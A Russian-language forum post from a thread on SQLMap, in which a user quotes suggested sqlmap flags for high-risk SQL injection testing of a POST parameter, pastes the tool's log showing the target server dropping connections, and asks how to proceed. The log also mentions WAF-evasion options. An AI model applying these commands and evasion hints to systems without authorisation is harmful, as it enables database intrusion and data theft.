Тема: Вопросы по SQLMap
Показать сообщение отдельно

  #1012  
Старый 21.02.2020, 18:36
NineCent
Новичок
Регистрация: 04.11.2018
Сообщений: 2
Провел на форуме:
764

Репутация: 0
По умолчанию
Цитата:
Сообщение от BabaDook  

тут файл с куками и прочим -p "service" --dbs --time-sec 5 --risk=3 --level=5
попробуй так, или установи старую версию sqlmap
Попробовал результат лучше но, теперь сервак выкидывает. Что можно далее предпринять?

[17:33:11] [INFO] POST parameter 'service' appears to be 'IBM DB2 stacked queries (heavy query - comment)' injectable

it looks like the back-end DBMS is 'IBM DB2'. Do you want to skip test payloads specific for other DBMSes? [Y/n] n

[17:34:27] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'

[17:34:27] [INFO] testing 'Generic UNION query (random number) - 1 to 20 columns'

[17:34:27] [INFO] testing 'Generic UNION query (NULL) - 21 to 40 columns'

[17:34:27] [INFO] testing 'Generic UNION query (random number) - 21 to 40 columns'

[17:34:27] [INFO] testing 'Generic UNION query (NULL) - 41 to 60 columns'

[17:34:27] [INFO] testing 'Generic UNION query (random number) - 41 to 60 columns'

[17:34:27] [INFO] testing 'Generic UNION query (NULL) - 61 to 80 columns'

[17:34:27] [INFO] testing 'Generic UNION query (random number) - 61 to 80 columns'

[17:34:27] [INFO] testing 'Generic UNION query (NULL) - 81 to 100 columns'

[17:34:27] [INFO] testing 'Generic UNION query (random number) - 81 to 100 columns'

[17:34:27] [INFO] checking if the injection point on POST parameter 'service' is a false positive

[17:34:27] [CRITICAL] connection dropped or unknown HTTP status code received. Try to force the HTTP User-Agent header with option '--user-agent' or switch '--random-agent'. sqlmap is going to retry the request(s)

[17:34:27] [WARNING] most likely web server instance hasn't recovered yet from previous timed based payload. If the problem persists please wait for a few minutes and rerun without flag 'T' in option '--technique' (e.g. '--flush-session --technique=BEUS') or try to lower the value of option '--time-sec' (e.g. '--time-sec=2')

[17:34:27] [WARNING] false positive or unexploitable injection point detected

[17:34:27] [WARNING] POST parameter 'service' does not seem to be injectable

[17:34:27] [CRITICAL] all tested parameters do not appear to be injectable. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
 
Ответить с цитированием